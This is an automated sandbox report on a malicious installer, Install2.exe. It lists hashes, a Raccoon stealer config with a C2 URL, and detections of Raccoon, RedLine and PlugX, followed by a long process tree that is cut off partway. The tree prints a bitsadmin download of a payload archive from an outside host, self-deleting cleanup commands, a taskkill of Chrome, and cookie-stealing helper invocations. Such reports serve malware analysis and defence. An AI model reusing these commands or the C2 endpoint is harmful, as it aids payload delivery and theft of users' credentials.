Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1802s
  • max time network
    1399s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    04-05-2021 20:23

General

  • Target

    Install2.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 49 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 41 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 35 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1232
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1252
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2416
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2424
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
              PID:2852
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
                PID:2628
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                1⤵
                  PID:2620
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                  1⤵
                    PID:1844
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                    1⤵
                      PID:1412
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                      • Modifies registry class
                      PID:1080
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:860
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:1000
                      • C:\Users\Admin\AppData\Local\Temp\Install2.exe
                        "C:\Users\Admin\AppData\Local\Temp\Install2.exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3932
                        • C:\Users\Admin\AppData\Local\Temp\is-BNP1O.tmp\Install2.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-BNP1O.tmp\Install2.tmp" /SL5="$B0062,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install2.exe"
                          2⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:2644
                          • C:\Users\Admin\AppData\Local\Temp\is-VKVMV.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-VKVMV.tmp\Ultra.exe" /S /UID=burnerch1
                            3⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3940
                            • C:\Program Files\Windows Mail\WJBTQKJKCP\ultramediaburner.exe
                              "C:\Program Files\Windows Mail\WJBTQKJKCP\ultramediaburner.exe" /VERYSILENT
                              4⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:2288
                              • C:\Users\Admin\AppData\Local\Temp\is-MKGJ3.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-MKGJ3.tmp\ultramediaburner.tmp" /SL5="$3002E,281924,62464,C:\Program Files\Windows Mail\WJBTQKJKCP\ultramediaburner.exe" /VERYSILENT
                                5⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:3384
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  6⤵
                                  • Executes dropped EXE
                                  PID:1560
                            • C:\Users\Admin\AppData\Local\Temp\33-98cfd-dab-02e96-c94628f6d7093\Myzhavylysa.exe
                              "C:\Users\Admin\AppData\Local\Temp\33-98cfd-dab-02e96-c94628f6d7093\Myzhavylysa.exe"
                              4⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Modifies system certificate store
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3612
                            • C:\Users\Admin\AppData\Local\Temp\30-a05f6-a9b-50d92-824594c7beb76\ZHexaeqajewa.exe
                              "C:\Users\Admin\AppData\Local\Temp\30-a05f6-a9b-50d92-824594c7beb76\ZHexaeqajewa.exe"
                              4⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2200
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zxepqzgi.uw0\sskiper.exe /s & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4880
                                • C:\Users\Admin\AppData\Local\Temp\zxepqzgi.uw0\sskiper.exe
                                  C:\Users\Admin\AppData\Local\Temp\zxepqzgi.uw0\sskiper.exe /s
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:4472
                                  • C:\Users\Admin\AppData\Local\Temp\1879093471.exe
                                    C:\Users\Admin\AppData\Local\Temp\1879093471.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4816
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      8⤵
                                        PID:4372
                                    • C:\Users\Admin\AppData\Local\Temp\919299611.exe
                                      C:\Users\Admin\AppData\Local\Temp\919299611.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:4476
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        8⤵
                                          PID:4648
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          8⤵
                                            PID:3680
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\zxepqzgi.uw0\sskiper.exe & exit
                                          7⤵
                                            PID:2292
                                            • C:\Windows\SysWOW64\PING.EXE
                                              ping 0
                                              8⤵
                                              • Runs ping.exe
                                              PID:4580
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pslwy44q.zxk\KiffMainE1.exe & exit
                                        5⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:196
                                        • C:\Users\Admin\AppData\Local\Temp\pslwy44q.zxk\KiffMainE1.exe
                                          C:\Users\Admin\AppData\Local\Temp\pslwy44q.zxk\KiffMainE1.exe
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3928
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z503dioj.cv1\001.exe & exit
                                        5⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:4116
                                        • C:\Users\Admin\AppData\Local\Temp\z503dioj.cv1\001.exe
                                          C:\Users\Admin\AppData\Local\Temp\z503dioj.cv1\001.exe
                                          6⤵
                                          • Executes dropped EXE
                                          PID:4256
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2vaxuaj1.4kr\setup.exe /eufour & exit
                                        5⤵
                                          PID:4284
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\inrfpzqf.u2a\installer.exe /qn CAMPAIGN="654" & exit
                                          5⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:4492
                                          • C:\Users\Admin\AppData\Local\Temp\inrfpzqf.u2a\installer.exe
                                            C:\Users\Admin\AppData\Local\Temp\inrfpzqf.u2a\installer.exe /qn CAMPAIGN="654"
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Enumerates connected drives
                                            • Modifies system certificate store
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of WriteProcessMemory
                                            PID:4652
                                            • C:\Windows\SysWOW64\msiexec.exe
                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\inrfpzqf.u2a\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\inrfpzqf.u2a\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619908046 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                              7⤵
                                                PID:3108
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qgzvb2we.exx\gpooe.exe & exit
                                            5⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:5108
                                            • C:\Users\Admin\AppData\Local\Temp\qgzvb2we.exx\gpooe.exe
                                              C:\Users\Admin\AppData\Local\Temp\qgzvb2we.exx\gpooe.exe
                                              6⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • Suspicious use of WriteProcessMemory
                                              PID:2152
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4120
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4420
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                • Executes dropped EXE
                                                PID:5084
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                • Executes dropped EXE
                                                PID:3428
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\odgu3ot5.gcv\setup.exe /mixfour & exit
                                            5⤵
                                              PID:4580
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                6⤵
                                                  PID:2292
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gbtvkosl.gy4\sskiper.exe /s & exit
                                                5⤵
                                                  PID:5024
                                                  • C:\Users\Admin\AppData\Local\Temp\gbtvkosl.gy4\sskiper.exe
                                                    C:\Users\Admin\AppData\Local\Temp\gbtvkosl.gy4\sskiper.exe /s
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:4444
                                                    • C:\Users\Admin\AppData\Local\Temp\1612198905.exe
                                                      C:\Users\Admin\AppData\Local\Temp\1612198905.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:4732
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                        8⤵
                                                          PID:1496
                                                      • C:\Users\Admin\AppData\Local\Temp\308638967.exe
                                                        C:\Users\Admin\AppData\Local\Temp\308638967.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:4580
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                          8⤵
                                                            PID:2352
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\gbtvkosl.gy4\sskiper.exe & exit
                                                          7⤵
                                                            PID:2564
                                                            • C:\Windows\SysWOW64\PING.EXE
                                                              ping 0
                                                              8⤵
                                                              • Runs ping.exe
                                                              PID:4728
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hq4mcoos.425\google-game.exe & exit
                                                        5⤵
                                                          PID:3844
                                                          • C:\Users\Admin\AppData\Local\Temp\hq4mcoos.425\google-game.exe
                                                            C:\Users\Admin\AppData\Local\Temp\hq4mcoos.425\google-game.exe
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3244
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                              7⤵
                                                              • Loads dropped DLL
                                                              • Modifies registry class
                                                              PID:4344
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fjcretb2.gqn\huesaa.exe & exit
                                                          5⤵
                                                            PID:3128
                                                            • C:\Users\Admin\AppData\Local\Temp\fjcretb2.gqn\huesaa.exe
                                                              C:\Users\Admin\AppData\Local\Temp\fjcretb2.gqn\huesaa.exe
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:2300
                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:4400
                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                7⤵
                                                                  PID:4968
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:5068
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:4452
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iirnbogw.kni\jvppp.exe & exit
                                                              5⤵
                                                                PID:496
                                                                • C:\Users\Admin\AppData\Local\Temp\iirnbogw.kni\jvppp.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\iirnbogw.kni\jvppp.exe
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:4552
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:2136
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:1332
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:4632
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:1056
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pl4dhfnz.nh4\askinstall39.exe & exit
                                                                5⤵
                                                                  PID:4932
                                                                  • C:\Users\Admin\AppData\Local\Temp\pl4dhfnz.nh4\askinstall39.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\pl4dhfnz.nh4\askinstall39.exe
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:3844
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                      7⤵
                                                                        PID:4848
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill /f /im chrome.exe
                                                                          8⤵
                                                                          • Kills process with taskkill
                                                                          PID:4560
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\omdbm1wm.otk\setup.exe & exit
                                                                    5⤵
                                                                      PID:2804
                                                                      • C:\Users\Admin\AppData\Local\Temp\omdbm1wm.otk\setup.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\omdbm1wm.otk\setup.exe
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:3748
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\omdbm1wm.otk\setup.exe"
                                                                          7⤵
                                                                            PID:4268
                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                              ping 1.1.1.1 -n 1 -w 3000
                                                                              8⤵
                                                                              • Runs ping.exe
                                                                              PID:4604
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ns3ocg4e.xci\y1.exe & exit
                                                                        5⤵
                                                                        • Loads dropped DLL
                                                                        PID:5080
                                                                        • C:\Users\Admin\AppData\Local\Temp\ns3ocg4e.xci\y1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\ns3ocg4e.xci\y1.exe
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:4468
                                                                          • C:\Users\Admin\AppData\Local\Temp\rWBACIoIYe.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\rWBACIoIYe.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Modifies system certificate store
                                                                            PID:4304
                                                                            • C:\Users\Admin\AppData\Roaming\1620167458705.exe
                                                                              "C:\Users\Admin\AppData\Roaming\1620167458705.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620167458705.txt"
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:4200
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\rWBACIoIYe.exe"
                                                                              8⤵
                                                                                PID:2460
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping 127.0.0.1 -n 3
                                                                                  9⤵
                                                                                  • Runs ping.exe
                                                                                  PID:4812
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ns3ocg4e.xci\y1.exe"
                                                                              7⤵
                                                                                PID:4800
                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                  timeout /T 10 /NOBREAK
                                                                                  8⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:4600
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\haj42dbm.hzq\SunLabsPlayer.exe /S & exit
                                                                            5⤵
                                                                              PID:4512
                                                                              • C:\Users\Admin\AppData\Local\Temp\haj42dbm.hzq\SunLabsPlayer.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\haj42dbm.hzq\SunLabsPlayer.exe /S
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Drops file in Program Files directory
                                                                                PID:4832
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssFCC2.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:4572
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssFCC2.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:2988
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssFCC2.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:4276
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssFCC2.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:1420
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssFCC2.tmp\tempfile.ps1"
                                                                                          7⤵
                                                                                            PID:5104
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              8⤵
                                                                                                PID:4604
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssFCC2.tmp\tempfile.ps1"
                                                                                              7⤵
                                                                                                PID:4248
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssFCC2.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                • Checks for any installed AV software in registry
                                                                                                PID:1540
                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Download via BitsAdmin
                                                                                                PID:4968
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  8⤵
                                                                                                    PID:4560
                                                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQIexLbqsL0IakhO -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Drops file in Program Files directory
                                                                                                  PID:5016
                                                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p2dMDO9fcSuQNujK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2580
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssFCC2.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                    PID:3560
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssFCC2.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                      PID:2020
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        8⤵
                                                                                                          PID:2352
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssFCC2.tmp\tempfile.ps1"
                                                                                                        7⤵
                                                                                                          PID:4544
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssFCC2.tmp\tempfile.ps1"
                                                                                                          7⤵
                                                                                                            PID:4192
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
